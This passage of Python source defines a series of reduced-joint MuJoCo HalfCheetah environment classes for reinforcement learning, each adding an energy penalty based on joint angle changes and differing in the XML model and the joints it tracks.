reset_noise_scale=0.1,
exclude_current_positions_from_observation=True,
energy_weights=0.):
utils.EzPickle.__init__(**locals())
self._forward_reward_weight = forward_reward_weight
#self.joint_list = ['bthigh', 'bshin', 'bfoot', 'fthigh', 'fshin', 'ffoot']
self.joint_list=['bthigh','bshin','bfoot','fthigh', 'ffoot']
self._ctrl_cost_weight = ctrl_cost_weight
self.energy_weights=energy_weights
self._reset_noise_scale = reset_noise_scale
self._exclude_current_positions_from_observation = (
exclude_current_positions_from_observation)
global path
mujoco_env.MujocoEnv.__init__(self, os.path.join(path, xml_file), 5)
#mujoco_env.MujocoEnv.__init__(self, xml_file, 5)
def control_cost(self, action):
control_cost = self._ctrl_cost_weight * np.sum(np.square(action))
return control_cost
def step(self, action):
states_angle = []
for j in self.joint_list:
states_angle.append(self.sim.data.get_joint_qpos(j))
#states=self._get_obs()
x_position_before = self.sim.data.qpos[0]
self.do_simulation(action, self.frame_skip)
x_position_after = self.sim.data.qpos[0]
x_velocity = ((x_position_after - x_position_before)
/ self.dt)
ctrl_cost = self.control_cost(action)
forward_reward = self._forward_reward_weight * x_velocity
observation = self._get_obs()
#next_states=observation
next_states_angle = []
for j in self.joint_list:
next_states_angle.append(self.sim.data.get_joint_qpos(j))
reward = forward_reward - ctrl_cost
done = False
energy = 0
for i in range(len(self.joint_list)):
delta_theta = np.abs(next_states_angle[i] - states_angle[i])
energy = energy + np.abs(action[i]) * delta_theta
reward -= self.energy_weights*energy
info = {
'x_position': x_position_after,
'x_velocity': x_velocity,
'energy' : energy,
'reward_run': forward_reward,
'reward_ctrl': -ctrl_cost,
'ori_reward':forward_reward-ctrl_cost
}
return observation, reward, done, info
def _get_obs(self):
position = self.sim.data.qpos.flat.copy()
velocity = self.sim.data.qvel.flat.copy()
if self._exclude_current_positions_from_observation:
position = position[1:]
observation = np.concatenate((position, velocity)).ravel()
return observation
def reset_model(self):
noise_low = -self._reset_noise_scale
noise_high = self._reset_noise_scale
qpos = self.init_qpos + self.np_random.uniform(
low=noise_low, high=noise_high, size=self.model.nq)
qvel = self.init_qvel + self._reset_noise_scale * self.np_random.randn(
self.model.nv)
self.set_state(qpos, qvel)
observation = self._get_obs()
return observation
def viewer_setup(self):
for key, value in DEFAULT_CAMERA_CONFIG.items():
if isinstance(value, np.ndarray):
getattr(self.viewer.cam, key)[:] = value
else:
setattr(self.viewer.cam, key, value)
class HalfCheetahEnv_5dofv3(mujoco_env.MujocoEnv, utils.EzPickle):
def __init__(self,
xml_file='half_cheetah_5dofv3.xml',
forward_reward_weight=1.0,
ctrl_cost_weight=0.1,
reset_noise_scale=0.1,
exclude_current_positions_from_observation=True,
energy_weights=0.):
utils.EzPickle.__init__(**locals())
self._forward_reward_weight = forward_reward_weight
#self.joint_list = ['bthigh', 'bshin', 'bfoot', 'fthigh', 'fshin', 'ffoot']
self.joint_list=['bthigh','bshin','bfoot', 'fshin', 'ffoot']
self._ctrl_cost_weight = ctrl_cost_weight
self.energy_weights=energy_weights
self._reset_noise_scale = reset_noise_scale
self._exclude_current_positions_from_observation = (
exclude_current_positions_from_observation)
global path
mujoco_env.MujocoEnv.__init__(self, os.path.join(path, xml_file), 5)
#mujoco_env.MujocoEnv.__init__(self, xml_file, 5)
def control_cost(self, action):
control_cost = self._ctrl_cost_weight * np.sum(np.square(action))
return control_cost
def step(self, action):
states_angle = []
for j in self.joint_list:
states_angle.append(self.sim.data.get_joint_qpos(j))
#states=self._get_obs()
x_position_before = self.sim.data.qpos[0]
self.do_simulation(action, self.frame_skip)
x_position_after = self.sim.data.qpos[0]
x_velocity = ((x_position_after - x_position_before)
/ self.dt)
ctrl_cost = self.control_cost(action)
forward_reward = self._forward_reward_weight * x_velocity
observation = self._get_obs()
#next_states=observation
next_states_angle = []
for j in self.joint_list:
next_states_angle.append(self.sim.data.get_joint_qpos(j))
reward = forward_reward - ctrl_cost
done = False
energy = 0
for i in range(len(self.joint_list)):
delta_theta = np.abs(next_states_angle[i] - states_angle[i])
energy = energy + np.abs(action[i]) * delta_theta
reward -= self.energy_weights*energy
info = {
'x_position': x_position_after,
'x_velocity': x_velocity,
'energy' : energy,
'reward_run': forward_reward,
'reward_ctrl': -ctrl_cost,
'ori_reward':forward_reward-ctrl_cost
}
return observation, reward, done, info
def _get_obs(self):
position = self.sim.data.qpos.flat.copy()
velocity = self.sim.data.qvel.flat.copy()
if self._exclude_current_positions_from_observation:
position = position[1:]
observation = np.concatenate((position, velocity)).ravel()
return observation
def reset_model(self):
noise_low = -self._reset_noise_scale
noise_high = self._reset_noise_scale
qpos = self.init_qpos + self.np_random.uniform(
low=noise_low, high=noise_high, size=self.model.nq)
qvel = self.init_qvel + self._reset_noise_scale * self.np_random.randn(
self.model.nv)
self.set_state(qpos, qvel)
observation = self._get_obs()
return observation
def viewer_setup(self):
for key, value in DEFAULT_CAMERA_CONFIG.items():
if isinstance(value, np.ndarray):
getattr(self.viewer.cam, key)[:] = value
else:
setattr(self.viewer.cam, key, value)
class HalfCheetahEnv_5dofv4(mujoco_env.MujocoEnv, utils.EzPickle):
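    """Reduced HalfCheetah (half_cheetah_5dofv4.xml); joints tracked for the
    energy penalty: bshin, bfoot, fthigh, fshin, ffoot (bthigh omitted)."""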
def __init__(self,
xml_file='half_cheetah_5dofv4.xml',
forward_reward_weight=1.0,
ctrl_cost_weight=0.1,
reset_noise_scale=0.1,
exclude_current_positions_from_observation=True,
energy_weights=0.):
utils.EzPickle.__init__(**locals())
self._forward_reward_weight = forward_reward_weight
#self.joint_list = ['bthigh', 'bshin', 'bfoot', 'fthigh', 'fshin', 'ffoot']
self.joint_list=['bshin','bfoot', 'fthigh','fshin', 'ffoot']
self._ctrl_cost_weight = ctrl_cost_weight
self.energy_weights=energy_weights
self._reset_noise_scale = reset_noise_scale
self._exclude_current_positions_from_observation = (
exclude_current_positions_from_observation)
global path
mujoco_env.MujocoEnv.__init__(self, os.path.join(path, xml_file), 5)
#mujoco_env.MujocoEnv.__init__(self, xml_file, 5)
def control_cost(self, action):
control_cost = self._ctrl_cost_weight * np.sum(np.square(action))
return control_cost
def step(self, action):
states_angle = []
for j in self.joint_list:
states_angle.append(self.sim.data.get_joint_qpos(j))
#states=self._get_obs()
x_position_before = self.sim.data.qpos[0]
self.do_simulation(action, self.frame_skip)
x_position_after = self.sim.data.qpos[0]
x_velocity = ((x_position_after - x_position_before)
/ self.dt)
ctrl_cost = self.control_cost(action)
forward_reward = self._forward_reward_weight * x_velocity
observation = self._get_obs()
#next_states=observation
next_states_angle = []
for j in self.joint_list:
next_states_angle.append(self.sim.data.get_joint_qpos(j))
reward = forward_reward - ctrl_cost
done = False
energy = 0
for i in range(len(self.joint_list)):
delta_theta = np.abs(next_states_angle[i] - states_angle[i])
energy = energy + np.abs(action[i]) * delta_theta
reward -= self.energy_weights*energy
info = {
'x_position': x_position_after,
'x_velocity': x_velocity,
'energy' : energy,
'reward_run': forward_reward,
'reward_ctrl': -ctrl_cost,
'ori_reward':forward_reward-ctrl_cost
}
return observation, reward, done, info
def _get_obs(self):
position = self.sim.data.qpos.flat.copy()
velocity = self.sim.data.qvel.flat.copy()
if self._exclude_current_positions_from_observation:
position = position[1:]
observation = np.concatenate((position, velocity)).ravel()
return observation
def reset_model(self):
noise_low = -self._reset_noise_scale
noise_high = self._reset_noise_scale
qpos = self.init_qpos + self.np_random.uniform(
low=noise_low, high=noise_high, size=self.model.nq)
qvel = self.init_qvel + self._reset_noise_scale * self.np_random.randn(
self.model.nv)
self.set_state(qpos, qvel)
observation = self._get_obs()
return observation
def viewer_setup(self):
for key, value in DEFAULT_CAMERA_CONFIG.items():
if isinstance(value, np.ndarray):
getattr(self.viewer.cam, key)[:] = value
else:
setattr(self.viewer.cam, key, value)
class HalfCheetahEnv_5dofv5(mujoco_env.MujocoEnv, utils.EzPickle):
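    """Reduced HalfCheetah (half_cheetah_5dofv5.xml); joints tracked for the
    energy penalty: bthigh, bfoot, fthigh, fshin, ffoot (bshin omitted)."""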
def __init__(self,
xml_file='half_cheetah_5dofv5.xml',
forward_reward_weight=1.0,
ctrl_cost_weight=0.1,
reset_noise_scale=0.1,
exclude_current_positions_from_observation=True,
energy_weights=0.):
utils.EzPickle.__init__(**locals())
self._forward_reward_weight = forward_reward_weight
#self.joint_list = ['bthigh', 'bshin', 'bfoot', 'fthigh', 'fshin', 'ffoot']
self.joint_list=['bthigh','bfoot', 'fthigh','fshin', 'ffoot']
self._ctrl_cost_weight = ctrl_cost_weight
self.energy_weights=energy_weights
self._reset_noise_scale = reset_noise_scale
self._exclude_current_positions_from_observation = (
exclude_current_positions_from_observation)
global path
mujoco_env.MujocoEnv.__init__(self, os.path.join(path, xml_file), 5)
#mujoco_env.MujocoEnv.__init__(self, xml_file, 5)
def control_cost(self, action):
control_cost = self._ctrl_cost_weight * np.sum(np.square(action))
return control_cost
def step(self, action):
states_angle = []
for j in self.joint_list:
states_angle.append(self.sim.data.get_joint_qpos(j))
#states=self._get_obs()
x_position_before = self.sim.data.qpos[0]
self.do_simulation(action, self.frame_skip)
x_position_after = self.sim.data.qpos[0]
x_velocity = ((x_position_after - x_position_before)
/ self.dt)
ctrl_cost = self.control_cost(action)
forward_reward = self._forward_reward_weight * x_velocity
observation = self._get_obs()
#next_states=observation
next_states_angle = []
for j in self.joint_list:
next_states_angle.append(self.sim.data.get_joint_qpos(j))
reward = forward_reward - ctrl_cost
done = False
energy = 0
for i in range(len(self.joint_list)):
delta_theta = np.abs(next_states_angle[i] - states_angle[i])
energy = energy + np.abs(action[i]) * delta_theta
reward -= self.energy_weights*energy
info = {
'x_position': x_position_after,
'x_velocity': x_velocity,
'energy' : energy,
'reward_run': forward_reward,
'reward_ctrl': -ctrl_cost,
'ori_reward':forward_reward-ctrl_cost
}
return observation, reward, done, info
def _get_obs(self):
position = self.sim.data.qpos.flat.copy()
velocity = self.sim.data.qvel.flat.copy()
if self._exclude_current_positions_from_observation:
position = position[1:]
observation = np.concatenate((position, velocity)).ravel()
return observation
def reset_model(self):
noise_low = -self._reset_noise_scale
noise_high = self._reset_noise_scale
qpos = self.init_qpos + self.np_random.uniform(
low=noise_low, high=noise_high, size=self.model.nq)
qvel = self.init_qvel + self._reset_noise_scale * self.np_random.randn(
self.model.nv)
self.set_state(qpos, qvel)
observation = self._get_obs()
return observation
def viewer_setup(self):
for key, value in DEFAULT_CAMERA_CONFIG.items():
if isinstance(value, np.ndarray):
getattr(self.viewer.cam, key)[:] = value
else:
setattr(self.viewer.cam, key, value)
class HalfCheetahEnv_5dofv6(mujoco_env.MujocoEnv, utils.EzPickle):
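    """Reduced HalfCheetah (half_cheetah_5dofv6.xml); joints tracked for the
    energy penalty: bthigh, bshin, fthigh, fshin, ffoot (bfoot omitted)."""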
def __init__(self,
xml_file='half_cheetah_5dofv6.xml',
forward_reward_weight=1.0,
ctrl_cost_weight=0.1,
reset_noise_scale=0.1,
exclude_current_positions_from_observation=True,
energy_weights=0.):
utils.EzPickle.__init__(**locals())
self._forward_reward_weight = forward_reward_weight
#self.joint_list = ['bthigh', 'bshin', 'bfoot', 'fthigh', 'fshin', 'ffoot']
self.joint_list=['bthigh', 'bshin', 'fthigh','fshin', 'ffoot']
self._ctrl_cost_weight = ctrl_cost_weight
self.energy_weights=energy_weights
self._reset_noise_scale = reset_noise_scale
self._exclude_current_positions_from_observation = (
exclude_current_positions_from_observation)
global path
mujoco_env.MujocoEnv.__init__(self, os.path.join(path, xml_file), 5)
#mujoco_env.MujocoEnv.__init__(self, xml_file, 5)
def control_cost(self, action):
control_cost = self._ctrl_cost_weight * np.sum(np.square(action))
return control_cost
def step(self, action):
states_angle = []
for j in self.joint_list:
states_angle.append(self.sim.data.get_joint_qpos(j))
#states=self._get_obs()
x_position_before = self.sim.data.qpos[0]
self.do_simulation(action, self.frame_skip)
x_position_after = self.sim.data.qpos[0]
x_velocity = ((x_position_after - x_position_before)
/ self.dt)
ctrl_cost = self.control_cost(action)
forward_reward = self._forward_reward_weight * x_velocity
observation = self._get_obs()
#next_states=observation
next_states_angle = []
for j in self.joint_list:
next_states_angle.append(self.sim.data.get_joint_qpos(j))
reward = forward_reward - ctrl_cost
done = False
energy = 0
for i in range(len(self.joint_list)):
delta_theta = np.abs(next_states_angle[i] - states_angle[i])
energy = energy + np.abs(action[i]) * delta_theta
reward -= self.energy_weights*energy
info = {
'x_position': x_position_after,
'x_velocity': x_velocity,
'energy' : energy,
'reward_run': forward_reward,
'reward_ctrl': -ctrl_cost,
'ori_reward':forward_reward-ctrl_cost
}
return observation, reward, done, info
def _get_obs(self):
position = self.sim.data.qpos.flat.copy()
velocity = self.sim.data.qvel.flat.copy()
if self._exclude_current_positions_from_observation:
position = position[1:]
observation = np.concatenate((position, velocity)).ravel()
return observation
def reset_model(self):
noise_low = -self._reset_noise_scale
noise_high = self._reset_noise_scale
qpos = self.init_qpos + self.np_random.uniform(
low=noise_low, high=noise_high, size=self.model.nq)
qvel = self.init_qvel + self._reset_noise_scale * self.np_random.randn(
self.model.nv)
self.set_state(qpos, qvel)
observation = self._get_obs()
return observation
def viewer_setup(self):
for key, value in DEFAULT_CAMERA_CONFIG.items():
if isinstance(value, np.ndarray):
getattr(self.viewer.cam, key)[:] = value
else:
setattr(self.viewer.cam, key, value)
class HalfCheetahEnv_4dof(mujoco_env.MujocoEnv, utils.EzPickle):
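    """Reduced HalfCheetah (half_cheetah_4dof.xml); joints tracked for the
    energy penalty: bthigh, bshin, fthigh, fshin (both foot joints omitted)."""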
def __init__(self,
xml_file='half_cheetah_4dof.xml',
forward_reward_weight=1.0,
ctrl_cost_weight=0.1,
reset_noise_scale=0.1,
exclude_current_positions_from_observation=True,
energy_weights=0.):
utils.EzPickle.__init__(**locals())
self._forward_reward_weight = forward_reward_weight
self.joint_list=['bthigh','bshin','fthigh','fshin']
self._ctrl_cost_weight = ctrl_cost_weight
self.energy_weights=energy_weights
self._reset_noise_scale = reset_noise_scale
self._exclude_current_positions_from_observation = (
exclude_current_positions_from_observation)
global path
mujoco_env.MujocoEnv.__init__(self, os.path.join(path, xml_file), 5)
#mujoco_env.MujocoEnv.__init__(self, xml_file, 5)
def control_cost(self, action):
control_cost = self._ctrl_cost_weight * np.sum(np.square(action))
return control_cost
def step(self, action):
states_angle = []
for j in self.joint_list:
states_angle.append(self.sim.data.get_joint_qpos(j))
#states=self._get_obs()
x_position_before = self.sim.data.qpos[0]
self.do_simulation(action, self.frame_skip)
x_position_after = self.sim.data.qpos[0]
x_velocity = ((x_position_after - x_position_before)
/ self.dt)
ctrl_cost = self.control_cost(action)
forward_reward = self._forward_reward_weight * x_velocity
observation = self._get_obs()
#next_states=observation
next_states_angle = []
for j in self.joint_list:
next_states_angle.append(self.sim.data.get_joint_qpos(j))
reward = forward_reward - ctrl_cost
done = False
energy = 0
for i in range(len(self.joint_list)):
delta_theta = np.abs(next_states_angle[i] - states_angle[i])
energy = energy + np.abs(action[i]) * delta_theta
reward -= self.energy_weights*energy
info = {
'x_position': x_position_after,
'x_velocity': x_velocity,
'energy' : energy,
'reward_run': forward_reward,
'reward_ctrl': -ctrl_cost,
'ori_reward':forward_reward-ctrl_cost
}
return observation, reward, done, info
def _get_obs(self):
position = self.sim.data.qpos.flat.copy()
velocity = self.sim.data.qvel.flat.copy()
if self._exclude_current_positions_from_observation:
position = position[1:]
observation = np.concatenate((position, velocity)).ravel()
return observation
def reset_model(self):
noise_low = -self._reset_noise_scale
noise_high = self._reset_noise_scale
qpos = self.init_qpos + self.np_random.uniform(
low=noise_low, high=noise_high, size=self.model.nq)
qvel = self.init_qvel + self._reset_noise_scale * self.np_random.randn(
self.model.nv)
self.set_state(qpos, qvel)
observation = self._get_obs()
return observation
def viewer_setup(self):
for key, value in DEFAULT_CAMERA_CONFIG.items():
if isinstance(value, np.ndarray):
getattr(self.viewer.cam, key)[:] = value
else:
setattr(self.viewer.cam, key, value)
class HalfCheetahEnv_4dofv2(mujoco_env.MujocoEnv, utils.EzPickle):
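    """Reduced HalfCheetah (half_cheetah_4dofv2.xml); joints tracked for the
    energy penalty: bshin, bfoot, fthigh, ffoot."""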
def __init__(self,
xml_file='half_cheetah_4dofv2.xml',
forward_reward_weight=1.0,
ctrl_cost_weight=0.1,
reset_noise_scale=0.1,
exclude_current_positions_from_observation=True,
energy_weights=0.):
utils.EzPickle.__init__(**locals())
self._forward_reward_weight = forward_reward_weight
#self.joint_list = ['bthigh', 'bshin', 'bfoot', 'fthigh', 'fshin', 'ffoot']
self.joint_list=['bshin','bfoot','fthigh','ffoot']
self._ctrl_cost_weight = ctrl_cost_weight
self.energy_weights=energy_weights
self._reset_noise_scale = reset_noise_scale
self._exclude_current_positions_from_observation = (
exclude_current_positions_from_observation)
global path
mujoco_env.MujocoEnv.__init__(self, os.path.join(path, xml_file), 5)
#mujoco_env.MujocoEnv.__init__(self, xml_file, 5)
def control_cost(self, action):
control_cost = self._ctrl_cost_weight * np.sum(np.square(action))
return control_cost
def step(self, action):
states_angle = []
for j in self.joint_list:
states_angle.append(self.sim.data.get_joint_qpos(j))
#states=self._get_obs()
x_position_before = self.sim.data.qpos[0]
self.do_simulation(action, self.frame_skip)
x_position_after = self.sim.data.qpos[0]
x_velocity = ((x_position_after - x_position_before)
/ self.dt)
ctrl_cost = self.control_cost(action)
forward_reward = self._forward_reward_weight * x_velocity
observation = self._get_obs()
#next_states=observation
next_states_angle = []
for j in self.joint_list:
next_states_angle.append(self.sim.data.get_joint_qpos(j))
reward = forward_reward - ctrl_cost
done = False
energy = 0
for i in range(len(self.joint_list)):
delta_theta = np.abs(next_states_angle[i] - states_angle[i])
energy = energy + np.abs(action[i]) * delta_theta
reward -= self.energy_weights*energy
info = {
'x_position': x_position_after,
'x_velocity': x_velocity,
'energy' : energy,
'reward_run': forward_reward,
'reward_ctrl': -ctrl_cost,
'ori_reward':forward_reward-ctrl_cost
}
return observation, reward, done, info
def _get_obs(self):
position = self.sim.data.qpos.flat.copy()
velocity = self.sim.data.qvel.flat.copy()
if self._exclude_current_positions_from_observation:
position = position[1:]
observation = np.concatenate((position, velocity)).ravel()
return observation
def reset_model(self):
noise_low = -self._reset_noise_scale
noise_high = self._reset_noise_scale
qpos = self.init_qpos + self.np_random.uniform(
low=noise_low, high=noise_high, size=self.model.nq)
qvel = self.init_qvel + self._reset_noise_scale * self.np_random.randn(
self.model.nv)
self.set_state(qpos, qvel)
observation = self._get_obs()
return observation
def viewer_setup(self):
for key, value in DEFAULT_CAMERA_CONFIG.items():
if isinstance(value, np.ndarray):
getattr(self.viewer.cam, key)[:] = value
else:
setattr(self.viewer.cam, key, value)
class HalfCheetahEnv_4dofv3(mujoco_env.MujocoEnv, utils.EzPickle):
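    """Reduced HalfCheetah (half_cheetah_4dofv3.xml); joints tracked for the
    energy penalty: bshin, bfoot, fshin, ffoot."""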
def __init__(self,
xml_file='half_cheetah_4dofv3.xml',
forward_reward_weight=1.0,
ctrl_cost_weight=0.1,
reset_noise_scale=0.1,
exclude_current_positions_from_observation=True,
energy_weights=0.):
utils.EzPickle.__init__(**locals())
self._forward_reward_weight = forward_reward_weight
#self.joint_list = ['bthigh', 'bshin', 'bfoot', 'fthigh', 'fshin', 'ffoot']
self.joint_list=['bshin','bfoot','fshin','ffoot']
self._ctrl_cost_weight = ctrl_cost_weight
self.energy_weights=energy_weights
self._reset_noise_scale = reset_noise_scale
self._exclude_current_positions_from_observation = (
exclude_current_positions_from_observation)
global path
mujoco_env.MujocoEnv.__init__(self, os.path.join(path, xml_file), 5)
#mujoco_env.MujocoEnv.__init__(self, xml_file, 5)
def control_cost(self, action):
control_cost = self._ctrl_cost_weight * np.sum(np.square(action))
return control_cost
def step(self, action):
states_angle = []
for j in self.joint_list:
states_angle.append(self.sim.data.get_joint_qpos(j))
#states=self._get_obs()
x_position_before = self.sim.data.qpos[0]
self.do_simulation(action, self.frame_skip)
x_position_after = self.sim.data.qpos[0]
x_velocity = ((x_position_after - x_position_before)
/ self.dt)
ctrl_cost = self.control_cost(action)
forward_reward = self._forward_reward_weight * x_velocity
observation = self._get_obs()
#next_states=observation
next_states_angle = []
for j in self.joint_list:
next_states_angle.append(self.sim.data.get_joint_qpos(j))
reward = forward_reward - ctrl_cost
done = False
energy = 0
for i in range(len(self.joint_list)):
delta_theta = np.abs(next_states_angle[i] - states_angle[i])
energy = energy + np.abs(action[i]) * delta_theta
reward -= self.energy_weights*energy
info = {
'x_position': x_position_after,
'x_velocity': x_velocity,
'energy' : energy,
'reward_run': forward_reward,
'reward_ctrl': -ctrl_cost,
'ori_reward':forward_reward-ctrl_cost
}
return observation, reward, done, info
def _get_obs(self):
position = self.sim.data.qpos.flat.copy()
velocity = self.sim.data.qvel.flat.copy()
if self._exclude_current_positions_from_observation:
position = position[1:]
observation = np.concatenate((position, velocity)).ravel()
return observation
def reset_model(self):
noise_low = -self._reset_noise_scale
noise_high = self._reset_noise_scale
qpos = self.init_qpos + self.np_random.uniform(
low=noise_low, high=noise_high, size=self.model.nq)
qvel = self.init_qvel + self._reset_noise_scale * self.np_random.randn(
self.model.nv)
self.set_state(qpos, qvel)
observation = self._get_obs()
return observation
def viewer_setup(self):
for key, value in DEFAULT_CAMERA_CONFIG.items():
if isinstance(value, np.ndarray):
getattr(self.viewer.cam, key)[:] = value
else:
setattr(self.viewer.cam, key, value)
class HalfCheetahEnv_4dofv4(mujoco_env.MujocoEnv, utils.EzPickle):
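    """Reduced HalfCheetah (half_cheetah_4dofv4.xml); joints tracked for the
    energy penalty: bshin, bfoot, fthigh, fshin."""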
def __init__(self,
xml_file='half_cheetah_4dofv4.xml',
forward_reward_weight=1.0,
ctrl_cost_weight=0.1,
reset_noise_scale=0.1,
exclude_current_positions_from_observation=True,
energy_weights=0.):
utils.EzPickle.__init__(**locals())
self._forward_reward_weight = forward_reward_weight
#self.joint_list = ['bthigh', 'bshin', 'bfoot', 'fthigh', 'fshin', 'ffoot']
self.joint_list=['bshin','bfoot','fthigh','fshin']
self._ctrl_cost_weight = ctrl_cost_weight
self.energy_weights=energy_weights
self._reset_noise_scale = reset_noise_scale
self._exclude_current_positions_from_observation = (
exclude_current_positions_from_observation)
global path
mujoco_env.MujocoEnv.__init__(self, os.path.join(path, xml_file), 5)
#mujoco_env.MujocoEnv.__init__(self, xml_file, 5)
def control_cost(self, action):
control_cost = self._ctrl_cost_weight * np.sum(np.square(action))
return control_cost
def step(self, action):
states_angle = []
for j in self.joint_list:
states_angle.append(self.sim.data.get_joint_qpos(j))
#states=self._get_obs()
x_position_before = self.sim.data.qpos[0]
self.do_simulation(action, self.frame_skip)
x_position_after = self.sim.data.qpos[0]
x_velocity = ((x_position_after - x_position_before)
/ self.dt)
ctrl_cost = self.control_cost(action)
forward_reward = self._forward_reward_weight * x_velocity
observation = self._get_obs()
#next_states=observation
next_states_angle = []
for j in self.joint_list:
next_states_angle.append(self.sim.data.get_joint_qpos(j))
reward = forward_reward - ctrl_cost
done = False
energy = 0
for i in range(len(self.joint_list)):
delta_theta = np.abs(next_states_angle[i] - states_angle[i])
energy = energy + np.abs(action[i]) * delta_theta
reward -= self.energy_weights*energy
info = {
'x_position': x_position_after,
'x_velocity': x_velocity,
'energy' : energy,
'reward_run': forward_reward,
'reward_ctrl': -ctrl_cost,
'ori_reward':forward_reward-ctrl_cost
}
return observation, reward, done, info
def _get_obs(self):
position = self.sim.data.qpos.flat.copy()
velocity = self.sim.data.qvel.flat.copy()
if self._exclude_current_positions_from_observation:
position = position[1:]
observation = np.concatenate((position, velocity)).ravel()
return observation
def reset_model(self):
noise_low = -self._reset_noise_scale
noise_high = self._reset_noise_scale
qpos = self.init_qpos + self.np_random.uniform(
low=noise_low, high=noise_high, size=self.model.nq)
qvel = self.init_qvel + self._reset_noise_scale * self.np_random.randn(
self.model.nv)
self.set_state(qpos, qvel)
observation = self._get_obs()
return observation
def viewer_setup(self):
for key, value in DEFAULT_CAMERA_CONFIG.items():
if isinstance(value, np.ndarray):
getattr(self.viewer.cam, key)[:] = value
else:
setattr(self.viewer.cam, key, value)
class HalfCheetahEnv_4dofv5(mujoco_env.MujocoEnv, utils.EzPickle):
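    """Reduced HalfCheetah (half_cheetah_4dofv5.xml); joints tracked for the
    energy penalty: bthigh, bfoot, fshin, ffoot."""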
def __init__(self,
xml_file='half_cheetah_4dofv5.xml',
forward_reward_weight=1.0,
ctrl_cost_weight=0.1,
reset_noise_scale=0.1,
exclude_current_positions_from_observation=True,
energy_weights=0.):
utils.EzPickle.__init__(**locals())
self._forward_reward_weight = forward_reward_weight
#self.joint_list = ['bthigh', 'bshin', 'bfoot', 'fthigh', 'fshin', 'ffoot']
self.joint_list=['bthigh','bfoot','fshin','ffoot']
self._ctrl_cost_weight = ctrl_cost_weight
self.energy_weights=energy_weights
self._reset_noise_scale = reset_noise_scale
self._exclude_current_positions_from_observation = (
exclude_current_positions_from_observation)
global path
mujoco_env.MujocoEnv.__init__(self, os.path.join(path, xml_file), 5)
#mujoco_env.MujocoEnv.__init__(self, xml_file, 5)
def control_cost(self, action):
control_cost = self._ctrl_cost_weight * np.sum(np.square(action))
return control_cost
def step(self, action):
states_angle = []
for j in self.joint_list:
states_angle.append(self.sim.data.get_joint_qpos(j))
#states=self._get_obs()
x_position_before = self.sim.data.qpos[0]
self.do_simulation(action, self.frame_skip)
x_position_after = self.sim.data.qpos[0]
x_velocity = ((x_position_after - x_position_before)
/ self.dt)
ctrl_cost = self.control_cost(action)
forward_reward = self._forward_reward_weight * x_velocity
observation = self._get_obs()
#next_states=observation
next_states_angle = []
for j in self.joint_list:
next_states_angle.append(self.sim.data.get_joint_qpos(j))
reward = forward_reward - ctrl_cost
done = False
energy = 0
for i in range(len(self.joint_list)):
delta_theta = np.abs(next_states_angle[i] - states_angle[i])
energy = energy + np.abs(action[i]) * delta_theta
reward -= self.energy_weights*energy
info = {
'x_position': x_position_after,
'x_velocity': x_velocity,
'energy' : energy,
'reward_run': forward_reward,
'reward_ctrl': -ctrl_cost,
'ori_reward':forward_reward-ctrl_cost
}
return observation, reward, done, info
def _get_obs(self):
position = self.sim.data.qpos.flat.copy()
velocity = self.sim.data.qvel.flat.copy()
if self._exclude_current_positions_from_observation:
position = position[1:]
observation = np.concatenate((position, velocity)).ravel()
return observation
def reset_model(self):
noise_low = -self._reset_noise_scale
noise_high = self._reset_noise_scale
qpos = self.init_qpos + self.np_random.uniform(
low=noise_low, high=noise_high, size=self.model.nq)
qvel = self.init_qvel + self._reset_noise_scale * self.np_random.randn(
self.model.nv)
self.set_state(qpos, qvel)
observation = self._get_obs()
return observation
def viewer_setup(self):
for key, value in DEFAULT_CAMERA_CONFIG.items():
if isinstance(value, np.ndarray):
getattr(self.viewer.cam, key)[:] = value
else:
setattr(self.viewer.cam, key, value)
class HalfCheetahEnv_4dofv6(mujoco_env.MujocoEnv, utils.EzPickle):
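    """Reduced HalfCheetah (half_cheetah_4dofv6.xml); joints tracked for the
    energy penalty: bthigh, bshin, fshin, ffoot."""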
def __init__(self,
xml_file='half_cheetah_4dofv6.xml',
forward_reward_weight=1.0,
ctrl_cost_weight=0.1,
reset_noise_scale=0.1,
exclude_current_positions_from_observation=True,
energy_weights=0.):
utils.EzPickle.__init__(**locals())
self._forward_reward_weight = forward_reward_weight
#self.joint_list = ['bthigh', 'bshin', 'bfoot', 'fthigh', 'fshin', 'ffoot']
self.joint_list=['bthigh','bshin','fshin','ffoot']
self._ctrl_cost_weight = ctrl_cost_weight
self.energy_weights=energy_weights
self._reset_noise_scale = reset_noise_scale
self._exclude_current_positions_from_observation = (
exclude_current_positions_from_observation)
global path
mujoco_env.MujocoEnv.__init__(self, os.path.join(path, xml_file), 5)
#mujoco_env.MujocoEnv.__init__(self, xml_file, 5)
def control_cost(self, action):
control_cost = self._ctrl_cost_weight * np.sum(np.square(action))
return control_cost
def step(self, action):
states_angle = []
for j in self.joint_list:
states_angle.append(self.sim.data.get_joint_qpos(j))
#states=self._get_obs()
x_position_before = self.sim.data.qpos[0]
self.do_simulation(action, self.frame_skip)
x_position_after = self.sim.data.qpos[0]
x_velocity = ((x_position_after - x_position_before)
/ self.dt)
ctrl_cost = self.control_cost(action)
forward_reward = self._forward_reward_weight * x_velocity
observation = self._get_obs()
#next_states=observation
next_states_angle = []
for j in self.joint_list:
next_states_angle.append(self.sim.data.get_joint_qpos(j))
reward = forward_reward - ctrl_cost
done = False
energy = 0
for i in range(len(self.joint_list)):
delta_theta = np.abs(next_states_angle[i] - states_angle[i])
energy = energy + np.abs(action[i]) * delta_theta
reward -= self.energy_weights*energy
info = {
'x_position': x_position_after,
'x_velocity': x_velocity,
'energy' : energy,
'reward_run': forward_reward,
'reward_ctrl': -ctrl_cost,
'ori_reward':forward_reward-ctrl_cost
}
return observation, reward, done, info
def _get_obs(self):
position = self.sim.data.qpos.flat.copy()
velocity = self.sim.data.qvel.flat.copy()
if self._exclude_current_positions_from_observation:
position = position[1:]
observation = np.concatenate((position, velocity)).ravel()
return observation
def reset_model(self):
noise_low = -self._reset_noise_scale
noise_high = self._reset_noise_scale
qpos = self.init_qpos + self.np_random.uniform(
low=noise_low, high=noise_high, size=self.model.nq)
qvel = self.init_qvel + self._reset_noise_scale * self.np_random.randn(
self.model.nv)
self.set_state(qpos, qvel)
observation = self._get_obs()
return observation
def viewer_setup(self):
for key, value in DEFAULT_CAMERA_CONFIG.items():
if isinstance(value, np.ndarray):
getattr(self.viewer.cam, key)[:] = value
else:
setattr(self.viewer.cam, key, value)
class HalfCheetahEnv_3doff(mujoco_env.MujocoEnv, utils.EzPickle):
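    """Three-joint 'front' HalfCheetah variant (half_cheetah_3dof_front.xml);
    joints tracked for the energy penalty: bthigh, fthigh, fshin."""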
def __init__(self,
xml_file='half_cheetah_3dof_front.xml',
